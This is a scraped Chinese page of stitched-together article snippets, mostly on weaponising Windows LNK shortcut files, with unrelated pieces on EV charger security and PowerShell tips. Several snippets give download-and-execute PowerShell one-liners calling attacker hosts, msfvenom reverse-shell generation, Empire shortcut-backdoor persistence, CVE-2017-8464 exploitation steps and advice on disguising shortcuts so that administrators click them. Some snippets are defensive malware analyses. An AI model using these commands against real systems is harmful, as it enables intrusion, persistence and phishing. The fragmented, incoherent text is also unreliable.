第一阶段是Windows快捷方式文件(LNK文件),第二阶段为Powershell脚本(已被ISESteriods混淆)。 其中的样本包括所有删除的文件,都可以下载。...完整的快捷方式 十六进制编辑器的结果如下。...变量_ / ===== \ / == \ / \ ___ /是快捷方式的targetLocation,因为它是作为参数传递的。...,在系统上创建一个新的快捷方式。...该快捷方式将与提供的参数一起在%StystemRoot%\ System32目录中执行Powershell 。 脚本中的最后一个函数如下。
随着电动汽车近年来的销售量不断增长,电动汽车充电桩的需求也不断增加,但随之而来充电桩的网络安全问题也日益显现。...以美国为例,根据JD Power的数据,电动汽车的销量占2022年所有车辆销售的5.8%,高于前一年的3.2%。...为了满足需求,解决电动汽车充电难的问题,拜登政府的目标是到2030年将车辆充电桩的数量增加到50万个。但是这也引起了网络安全专家的担心,因为这种急于求成的做法不利于网络安全的建设。...当然,由于电动车充电站必须连接到公共网络,确保它们的通信是加密的,这对维护设备的安全至关重要。黑客往往会在公共网络上寻找安全性差的设备,因此,充电桩运营商必须采取严格的保护措施,让黑客攻击无从下手。...因此,对于普通的用车用户来说,强制建立正确的安全保障是不现实的,所以,确保设备本身以及通信加密应该始终是供应商的责任。
查看快捷方式的属性将显示目标字段已成功修改以执行PowerShell有效负载。 ? 由于快捷方式存在于启动文件夹中,因此暂存器将在下一次Windows登录中执行,并且将与命令和控制服务器建立连接。...默认情况下,此模块将使用写字板图标伪装成可信任的应用程序。 ? 快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。...EmpireEmpire包含一个持久性模块,该模块可以后门合法的快捷方式(.LNK),以执行任意的PowerShell有效负载。现有快捷方式的目标字段将被修改以执行存储在注册表项中的base64脚本。...usemodule persistence/userland/backdoor_lnkEmpire–后门现有快捷方式查看快捷方式的属性将显示目标字段已成功修改以执行PowerShell有效负载。...Empire-写字板快捷方式快捷方式的目标字段将使用执行Base64有效负载的PowerShell命令填充。可以将快捷方式转移并移动到启动文件夹中以保持持久性。
用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。...看到以上界面就代表后门安装完成 当我们运行navicat快捷方式的同时 可以看到powershell.exe已经悄悄的链接empire ?...2、实现原理 它会将原来快捷目标修改为powershell.exe的地址,并且利用powershell去运行navicat程序与恶意代码。 ? 解密后的代码 ?...点击快捷方式后先执行快捷方式原来链接的目标,然后在注册表读取HKCU:\Software\Microsoft\Windows\debug的值运行(后门安装时把执行的代码加密后放到了HKCU:\Software...4、总结 利用快捷方式去攻击,已经是一个很老的话题了,但是有时候渗透中添加启动项/服务/任务计划失败的情况下可以尝试用此方法,劫持一个经常使用的程序快捷方式,达到权限维持的效果,windows下基于powershell
对,你想的没错,我们就是创建一个快捷方式,里面的链接替换上我们的有效载荷,欺骗管理员点击,运行我们的shell和执行代码。 用社会工程学的角度来提高我们方法的可行性的几点: “ 1....替换的快捷图标可以改成一些常用的软件,但不仅限于软件,提高管理员点击的可能性。 2. 改好的快捷方式可以放在比较显眼的地方,进一步提高可能性。 3....进一步优化: 前面虽然执行了木马文件,但是真正链接的程序我们并没用执行,而是被替换掉了,这样就会让人引起怀疑,就会猜测是不是路径错了,一打开快捷方式属性,然后就露馅了嘛,所以我又自己瞎倒腾!...Powershell配置文件: PowerShell配置文件是一个PowerShell脚本,您可以对其进行自定义,并将其特定于会话的元素添加到您启动的每个PowerShell会话中。...: New-Item -Path $ Profile -Type File -Force 重写该配置文件 Out-File 演示: ?
它能帮助你提升渗透测试技能和黑盒测试技能,它包含了一些不断更新的挑战,其中有模拟真实世界场景,也有倾向于CTF风格的挑战。 https://www.hackthebox.eu/ ?...powershell正常的,那我们本地搭建一个简易的HTTP服务器放上我们的powershell反弹shell脚本,让靶机进行远程下载执行反弹一个shell。...然后在目标靶机telnet上执行这段代码,就是远程执行powershell脚本。...我们在刚刚反弹的shell中去执行这个脚本,来检测目标系统的信息。...这里我要说一下就是这里创建的快捷方式是存在内存里面的,在调用这个函数的SAVE函数之前,这个快捷方式是存在内存里面的,我们只是需要这个ZKAccess3.5Security System.lnk里面的详细工整的信息只是通过这个方式查看而已
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统...当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限...注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。...环境搭建: 攻击机:kali ip:10.0.0.140 目标靶机:win2008r2x64 ip:192.168.99.104 1.kali下生成一个反弹的 ps1的shell: msfvenom...start 5.访问web下的search.ps1,可以直接访问: 6.在靶机上创建一个powershell远程快捷: powershell -windowstyle hidden -exec bypass
用到的工具: Cobalt Strike 这个基础用法 我们基于kali的系统,首先打开我们的cs,进行基础配置(监听器之类) 然后我们生成一个链接 powershell.exe -nop -w...IEX ((new-object net.webclient).downloadstring('http://192.168.119.135:80/a'))" 我们复制这个代码 第二步,我们到win10目标机器中...,创建一个快捷方式 右击桌面选择快捷方式 找到windows中powershell的位置,正常的位置 C:\Windows\System32\WindowsPowerShell\v1.0 然后我们将...power shell的位置和上面的木马链接拼接起来 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -...,地址在 %SystemRoot%\System32\shell32.dll 点一下确定就会出现这么多,我们根据自己的伪装需要来选择 我们双击打开,kali中的cs很快上线
文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell...命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch...生成代码 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129...:80/a'))" Step 2:制作一下txt文本 Step 3:制作一下powershell $file = Get-Content "Al1ex.txt" $WshShell = New-Object...,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~
在2017年上半年,我们发现使用命令行逃逸技术和混淆技术的攻击者数量正在显著增加,网络间谍组织和专门针对金融领域的黑客组织仍在继续采用最先进的应用白名单绕过技术和新型混淆技术来攻击他们的目标(包括企业和用户...命令,然后在另一个环境变量(MICROSOFT_UPDATE_SERVICE)中设置字符串“powershell -”,接下来PowerShell将会运行它通过StdIn接收到的命令了。...随着技术的不断发展,新型应用白名单绕过技术也在不断涌现出来,而攻击者也会在他们的攻击活动中迅速采用这些技术,再配合上新型的混淆技术,他们就总是能够领先于安全防护产品了。...在这一周,FireEye发现FIN又引入了针对JavaScript和cmd.exe的新型混淆技术,这些技术的实现依赖于FIN7以往最喜欢使用的技术,即在初始感染阶段所使用的DOCX和RTF钓鱼文件中隐藏快捷方式文件...除此之外,攻击者此后很可能还会利用新型的混淆技术来监控目标组织的网络通信数据和终端节点,而作为网络防御方我们也不能再依赖于单一的方法来检测这些威胁了。
,而这种链接跟快捷方式是不一样的。...---- 0x00 背景介绍:mklink mklink 可以像创建快捷方式一样建立文件或文件夹的链接,但不同于快捷方式的是,mklink 创建的链接绝大多数程序都不会认为那是一个链接,而是一个实实在在的文件或文件夹...使用方式 适用于 快捷方式小箭头 不带参数 文件 有 /D 文件夹 有 /J 文件夹 有 /H 文件 无 上面的表格顺序,从上到下的行为从越来越像快捷方式到越来越像两个独立的文件夹。...0x01 坑:PowerShell 中没有 mklink 命令 是的,PowerShell 中就是中没有 mklink 命令。...如果你是一个重度强迫症患者,那么可以编写一个 powershell 的扩展函数来实现:Creating a Symbolic Link using PowerShell - Learn Powershell
之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的...快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢...CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令...,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。...奇技淫巧 如果你右键查看,细心的朋友已经注意到有一个快捷键的选项,快捷方式的快捷方式,他是个无公害的功能,如果被恶意替换冲突某些程序的快捷方式呢?
其实Windows中的CMD也足够好用,作为CMD的替代者,PowerShell其实是完全不比Linux下的Shell体验差的,本篇记录下PowerShell的一些操作技巧。...常用命令一览 PowerShell共有400多条系统指令,同时也兼容了CMD的操作指令,网上都能查阅到相应的指令及其用法,这里不再赘述。...快速启动应用 经常会把桌面堆得满满的又找不到程序和文件,其实使用PowerShell可以很好的解决这个问题。...把桌面的快捷方式或程序本身放在一个固定的目录下,然后将这个目录写入Path环境变量,保存后就可以直接在PowerShell中输入快捷方式.link或程序.exe来启动了,只要你记住软件的名字,启动起来就十分方便了...如上图所示 在C:\下创建一个tool目录,将快捷方式或程序放入 将C:\tool添加进Path环境变量 在PowerShell中输入putty.exe可以直接启动putty 进入C:\ 输入p按tab
此时通过开始菜单,搜寻 Developer Command Prompt 右击打开所在文件夹,可以找到快捷方式 右击快捷方式找到启动项 %comspec% /k "C:\Program Files (x86...此时在 TotalCommnader 进入文件夹,可以点击命令行图标进入开发者命令行,同时自动设置了命令行当前文件夹是进入的文件夹 对熟悉 PowerShell 的小伙伴,可以将命令行修改为 PowerShell...命令 还是和上面步骤相同,找到 PowerShell 版本的 Developer PowerShell for VS 2019 快捷方式,右击属性可以看到下面代码 C:\Windows\SysWOW64...,那么上面的代码和我不相同 将上面代码的 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 和参数放在工具的命令和参数,同时参数需要加上...; cd %P 才能让 PowerShell 跳转到文件夹 这里的 ; cd %P 是通过 ; 让 PowerShell 执行多语句,而 %P 是 TotalCommander 的命令会替换为当前文件夹
简单的说,符号链接就是快捷方式,不过和快捷方式不同的是,符号链接会被识别为真实的文件或者文件夹。...而快捷方式这个东西,如果你在Windows下用过命令行的话,应该可以注意到快捷方式只是一个特殊的文件,它有自己的文件扩展名lnk。...正因为此,如果你将一个软件的重要目录移走,然后用那个目录的快捷方式替换它,那么这个软件是无法正常运行的。但是如果你用符号链接替换它的话,软件是可以正常运行的,就像从来没有移动过这个文件夹一样!...在cmd和powershell中都有对应的创建符号链接的命令,不过这里我只介绍powershell的命令。powershell作为cmd的替代品。...假如如果有想学习Windows命令行的同学的话,最好学习powershell。cmd这种东西能不碰尽量不碰。
该病毒在2019年被首次发现,至今依然在不断扩大其影响范围。火绒安全软件(个人版、企业版)可查杀该病毒。 ?...病毒传播趋势图 被感染的主机会通过计划任务定时执行或直接执行PowerShell命令行,命令行下载执行PowerShell脚本。命令行的具体代码,如下图所示: ?...PowerShell命令行 下载得到的PowerShell下载器脚本(经过去混淆后)如下图所示: ? 去混淆后的脚本 下载器木马脚本的主体功能为下载执行挖矿模块和病毒传播模块。...并将木马下载器js脚本flashplayer.tmp放入不同用户的%APPDATA%目录下, 并将启动快捷方式flashplayer.lnk放到不同用户的开机启动目录中。 ?...SQL Server暴破传播 4) USBLnk漏洞传播: 病毒会在主机的移动硬盘和网络硬盘中创建快捷方式和相应的dll。
关于MeterPwrShell MeterPwrShell是一款功能强大的自动化工具,可以帮助广大研究人员以自动化的形式生成完美的PowerShell Payload。...MeterPwrShell基于Metasploit框架和amsi.fail实现其功能,可以生成PowerShell One-Liner,并能够创建Meterpreter Shell,而且还可以绕过AMSI...; 可轻松绕过Windows Defender; 工具要求 Kali Linux、Ubuntu或Debian; Metasploit框架; 接入网络(目标主机和攻击者主机都需要); 工具下载 广大研究人员可以使用下列命令将该项目源码克隆至本地...MeterPwrShell's Banner showlastdebuglog : Well,Its kinda self-explanatory tho 攻击向量 BadUSB 恶意快捷方式...(lnk2pwn) 恶意宏文档Payload MS DDE漏洞利用 在目标设备上执行命令以利用任意漏洞 项目地址: MeterPwrShell:【GitHub传送门】
早在6月13日,微软发布补丁修复编号为CVE-2017-8464的漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以...*2)PowerShell 这个使用Powershell的方法并非先前网络上流传的CVE-2017-8464复现方法。...首先下载Export-LNKPwn.ps1 注意: -需要4.0或以上.NET库版本,作者使用了一些只有PowerShell 5.0才有的构造函数(如new()),他打算将版本要求降低到....NET 3.5 和PowerShell 2.0,这样的话模块在所有目标环境中都能被载入内存。...参数说明: LNKOutPath:本地保存LNK文件的全路径。 TargetCPLPath:本地/远程目标cpl的全路径。
方式一:引诱目标点开“美图” 当目标点开美图(恶意LNK快捷方式文件:confidential.jpg.lnk),使目标认为他正在打开图像(confidential.jpg),HTA dropper 隐藏在快捷方式文件中...LNK将执行HTA,HTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。...,实例中USB文件运行的命令容易被杀软识别出来 方式二:针对”README.txt”文件 当目标打开README.txt时,实际上运行的是恶意的settingcontent-ms文件,文件结构准遵循XML...构建恶意设置的快捷方式文件。...这里有个问题是setcontent-ms文件默认在“C:\Windows\System32”中打开,这样我们必须知道USB的盘符,为此使用Powershell的脚本如下: %windir%\system32
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。...在windows10上创建一个快捷方式: powershell -windowstyle hidden -exec bypass -c "IEX(New-ObjectNet.WebClient).DownloadString...开始攻击,并在windows10下点击powershell.exe ? ? 测试成功!
领取专属 10元无门槛券
手把手带您无忧上云